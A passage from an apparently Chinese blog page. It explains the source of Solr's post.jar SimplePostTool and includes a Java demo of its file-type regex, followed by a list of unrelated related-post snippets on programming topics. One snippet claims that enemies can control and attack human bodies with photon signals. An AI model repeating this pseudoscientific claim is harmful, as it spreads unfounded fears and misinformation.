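                "http://localhost:8983/solr/demo/update", "q=a=b"));
    }
}
```

Because `isOn` is a substring test, a value such as `n` counts as on while `no` does not, and upper-case `TRUE` is rejected. Likewise, `appendParam` silently drops any pair whose value contains `=`, so such values need to be URL-encoded first, as the usage text for `-Dparams` already requires.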

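To see what `getFileFilterFromFileTypes` produces for a given `-Dfiletypes` value, the following sketch rebuilds the regular expression outside the tool. `FileTypeFilterDemo` and its method names are hypothetical; only the string building and the case-insensitive `find()` mirror the source above.

```java
import java.util.regex.Pattern;

/** Rebuilds the -Dfiletypes regular expression outside SimplePostTool. */
final class FileTypeFilterDemo {

    // Mirrors getFileFilterFromFileTypes: "xml,json" becomes ^.*\.(xml|json)$
    static String toRegex(String fileTypes) {
        if (fileTypes.equals("*")) {
            return ".*";
        }
        return "^.*\\.(" + fileTypes.replace(",", "|") + ")$";
    }

    // Mirrors GlobFileFilter.accept: case-insensitive find() on the file name.
    static boolean accepts(String fileTypes, String fileName) {
        return Pattern.compile(toRegex(fileTypes), Pattern.CASE_INSENSITIVE)
                .matcher(fileName)
                .find();
    }

    public static void main(String[] args) {
        System.out.println(toRegex("xml,json"));
        System.out.println(accepts("xml,json", "books.XML"));
        System.out.println(accepts("xml,json", "notes.txt"));
        System.out.println(accepts("xml", "data.xml.bak"));
    }
}
```

The extension has to be the last part of the file name, so `data.xml.bak` is not accepted by `-Dfiletypes=xml`, while `books.XML` passes because matching ignores case.
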
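Once you understand the post.jar source code, you will be more comfortable using post.jar to add and delete index entries. The screenshots below show how to run the SimplePostTool class in Eclipse to test indexing: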

If you have any other questions, add me on QQ (7-3-6-0-3-1-3-0-5) or join the group so we can learn together!

Eclipse 问题 A resource exists with a different case bozch eclipse
在使用Eclipse进行开发的时候，出现了如下的问题： Description Resource Path Location TypeThe project was not built due to "A resource exists with a different case: '/SeenTaoImp_zhV2/bin/seentao'.&
编程之美-小飞的电梯调度算法 bylijinnan 编程之美
public class AptElevator { /** * 编程之美小飞电梯调度算法 * 在繁忙的时间，每次电梯从一层往上走时，我们只允许电梯停在其中的某一层。 * 所有乘客都从一楼上电梯，到达某层楼后，电梯听下来，所有乘客再从这里爬楼梯到自己的目的层。 * 在一楼时，每个乘客选择自己的目的层，电梯则自动计算出应停的楼层。 * 问：电梯停在哪
SQL注入相关概念 chenbowen00 sql Web 安全
SQL Injection：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。首先让我们了解什么时候可能发生SQ
[光与电]光子信号战防御原理 comsci 原理
无论是在战场上,还是在后方,敌人都有可能用光子信号对人体进行控制和攻击,那么采取什么样的防御方法,最简单,最有效呢? 我们这里有几个山寨的办法,可能有些作用,大家如果有兴趣可以去实验一下根据光
oracle 11g新特性:Pending Statistics daizj oracle dbms_stats
oracle 11g新特性:Pending Statistics 转从11g开始，表与索引的统计信息收集完毕后，可以选择收集的统信息立即发布，也可以选择使新收集的统计信息处于pending状态，待确定处于pending状态的统计信息是安全的，再使处于pending状态的统计信息发布，这样就会避免一些因为收集统计信息立即发布而导致SQL执行计划走错的灾难。在 11g 之前的版本中，D
快速理解RequireJs dengkane jquery requirejs
RequireJs已经流行很久了，我们在项目中也打算使用它。它提供了以下功能：声明不同js文件之间的依赖可以按需、并行、延时载入js库可以让我们的代码以模块化的方式组织初看起来并不复杂。在html中引入requirejs 在HTML中，添加这样的 <script> 标签： <script src="/path/to
C语言学习四流程控制if条件选择、for循环和强制类型转换 dcj3sjt126com c
# include <stdio.h> int main(void) { int i, j; scanf("%d %d", &i, &j); if (i > j) printf("i大于j\n"); else printf("i小于j\n"); retu
dictionary的使用要注意 dcj3sjt126com IO
NSDictionary *dict = [NSDictionary dictionaryWithObjectsAndKeys: user.user_id , @"id", user.username , @"username",
Android 中的资源访问(Resource) finally_m xml android String drawable color
简单的说，Android中的资源是指非代码部分。例如，在我们的Android程序中要使用一些图片来设置界面，要使用一些音频文件来设置铃声，要使用一些动画来显示特效，要使用一些字符串来显示提示信息。那么，这些图片、音频、动画和字符串等叫做Android中的资源文件。在Eclipse创建的工程中，我们可以看到res和assets两个文件夹，是用来保存资源文件的，在assets中保存的一般是原生
Spring使用Cache、整合Ehcache 234390216 spring cache ehcache @Cacheable
Spring使用Cache 从3.1开始，Spring引入了对Cache的支持。其使用方法和原理都类似于Spring对事务管理的支持。Spring Cache是作用在方法上的，其核心思想是这样的：当我们在调用一个缓存方法时会把该方法参数和返回结果作为一个键值对存放在缓存中，等到下次利用同样的
当druid遇上oracle blob(clob) jackyrong oracle
http://blog.csdn.net/renfufei/article/details/44887371 众所周知，Oracle有很多坑, 所以才有了去IOE。在使用Druid做数据库连接池后，其实偶尔也会碰到小坑，这就是使用开源项目所必须去填平的。【如果使用不开源的产品，那就不是坑，而是陷阱了，你都不知道怎么去填坑】用Druid连接池，通过JDBC往Oracle数据库的
easyui datagrid pagination获得分页页码、总页数等信息 ldzyz007
var grid = $('#datagrid'); var options = grid.datagrid('getPager').data("pagination").options; var curr = options.pageNumber; var total = options.total; var max =
浅析awk里的数组 nigelzeng 二维数组 array 数组 awk
awk绝对是文本处理中的神器，它本身也是一门编程语言，还有许多功能本人没有使用到。这篇文章就单单针对awk里的数组来进行讨论，如何利用数组来帮助完成文本分析。有这么一组数据： abcd,91#31#2012-12-31 11:24:00 case_a,136#19#2012-12-31 11:24:00 case_a,136#23#2012-12-31 1
搭建 CentOS 6 服务器(6) - TigerVNC rensanning centos
安装GNOME桌面环境 # yum groupinstall "X Window System" "Desktop" 安装TigerVNC # yum -y install tigervnc-server tigervnc 启动VNC服务 # /etc/init.d/vncserver restart # vncser
Spring 数据库连接整理 tomcat_oracle spring bean jdbc
1、数据库连接jdbc.properties配置详解　　jdbc.url=jdbc:hsqldb:hsql://localhost/xdb 　　jdbc.username=sa 　　jdbc.password= 　　jdbc.driver=不同的数据库厂商驱动，此处不一一列举　　接下来，详细配置代码如下：　　 Spring连接池
Dom4J解析使用xpath java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常 xp9802
用Dom4J解析xml,以前没注意,今天使用dom4j包解析xml时在xpath使用处报错异常栈：java.lang.NoClassDefFoundError: org/jaxen/JaxenException异常导入包 jaxen-1.1-beta-6.jar 解决; &nb